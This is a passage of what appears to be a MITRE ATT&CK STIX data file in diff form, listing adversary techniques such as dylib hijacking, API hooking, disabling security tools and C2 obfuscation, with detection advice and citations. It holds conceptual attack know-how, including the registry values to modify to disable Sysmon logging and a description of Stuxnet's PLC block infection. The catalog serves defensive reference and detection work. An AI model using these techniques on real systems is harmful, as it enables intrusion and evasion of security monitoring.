"source_name": "Microsoft Detect Outlook Forms", + "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", + "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack" + }, + { + "source_name": "SensePost NotRuler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/notruler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Dylib Hijacking", + "description": "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.\n\nA common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)\n\nIf the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "root" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--aa8bfbc9-78dc-41a4-a03b-7453e0fdccda", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1157", + "external_id": "T1157" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html", + "external_id": "CAPEC-471" + }, + { + "source_name": "Writing Bad Malware for OSX", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + }, + { + "source_name": "Malware Persistence on OS X", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-13T23:56:48.161Z", + "name": "Hooking", + "description": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)\n\nOne type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "ics-privesc" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "x_mitre_effective_permissions": [], + "x_mitre_permissions_required": [], + "x_mitre_remote_support": false, + "x_mitre_system_requirements": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0874", + "external_id": "T0874" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Hooking Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1179/" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Control Device Identification", + "description": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0808", + "external_id": "T0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T21:13:46.640Z", + "name": "Disable or Modify Tools", + "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) \n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Gordon Long, Box, Inc., @ethicalhax", + "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security", + "Nathaniel Quist, Palo Alto Networks", + "Gal Singer, @galsinger29, Team Nautilus Aqua Security", + "Daniel Feichter, @VirtualAllocEx, Infosec Tirol", + "Cian Heasley", + "Alex Soler, AttackIQ", + "Sarathkumar Rajendran, Microsoft Defender365", + "Lucas Heiligenstein" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\n\nLack of expected log events may be suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Containers", + "IaaS", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Log analysis", + "Signature-based detection", + "Host intrusion prevention systems", + "File monitoring" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "created": "2020-02-21T20:32:20.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/001", + "external_id": "T1562.001" + }, + { + "source_name": "Analysis of FG-IR-22-369", + "description": " Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of FG-IR-22-369. Retrieved May 15, 2023.", + "url": "https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis" + }, + { + "source_name": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation", + "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.", + "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem" + }, + { + "source_name": "OutFlank System Calls", + "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.", + "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" + }, + { + "source_name": "disable_win_evt_logging", + "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", + "url": "https://ptylu.github.io/content/report/report.html?report=25" + }, + { + "source_name": "chasing_avaddon_ransomware", + "description": "Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.", + "url": "https://www.mandiant.com/resources/chasing-avaddon-ransomware" + }, + { + "source_name": "doppelpaymer_crowdstrike", + "description": "Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.", + "url": "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/" + }, + { + "source_name": "avoslocker_ransomware", + "description": "Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.", + "url": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html" + }, + { + "source_name": "dharma_ransomware", + "description": "Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.", + "url": "https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/" + }, + { + "source_name": "MDSec System Calls", + "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.", + "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/" + }, + { + "source_name": "SCADAfence_ransomware", + "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.", + "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf" + }, + { + "source_name": "demystifying_ryuk", + "description": "Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.", + "url": "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-02T17:18:39.004Z", + "name": "Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "created": "2020-03-02T14:19:22.609Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1565", + "external_id": "T1565" + }, + { + "source_name": "Sygnia Elephant Beetle Jan 2022", + "description": "Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.", + "url": "https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Inter-Process Communication", + "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User", + "SYSTEM" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "created": "2020-02-12T14:08:48.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1559", + "external_id": "T1559" + }, + { + "source_name": "Linux IPC", + "description": "N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.", + "url": "https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them." + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-02T19:04:35.389Z", + "name": "Data Obfuscation", + "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "created": "2017-05-31T21:30:18.931Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1001", + "external_id": "T1001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Program Organization Units", + "description": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)\n \nStuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected (Citation: Stuxnet - Symantec - 201102):\n*Increase the size of the original block.\n*Write malicious code to the beginning of the block.\n*Insert the original OB1 code after the malicious code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0844", + "external_id": "T0844" + }, + { + "source_name": "Guidance - IEC61131", + "description": "John Karl-Heinz. (n.d.). Programming Industrial Automation Systems. Retrieved October 22, 2019.", + "url": "http://www.dee.ufrj.br/controle%20automatico/cursos/IEC61131-3%20Programming%20Industrial%20Automation%20Systems.pdf" + }, + { + "source_name": "PLCBlaster - Spenneberg", + "description": "Spenneberg, Ralf, Maik Brüggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + }, + { + "source_name": "Stuxnet - Symantec - 201102", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T21:06:07.690Z", + "name": "Data from Network Shared Drive", + "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "David Tayouri" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Privileges to access network shared drive" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "created": "2017-05-31T21:30:41.022Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1039", + "external_id": "T1039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-12T20:19:21.620Z", + "name": "Web Services", + "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Dor Edry, Microsoft" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "created": "2020-10-01T01:01:00.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/006", + "external_id": "T1584.006" + }, + { + "source_name": "Recorded Future Turla Infra 2020", + "description": "Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.", + "url": "https://www.recordedfuture.com/turla-apt-infrastructure/" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Modify System Image", + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the 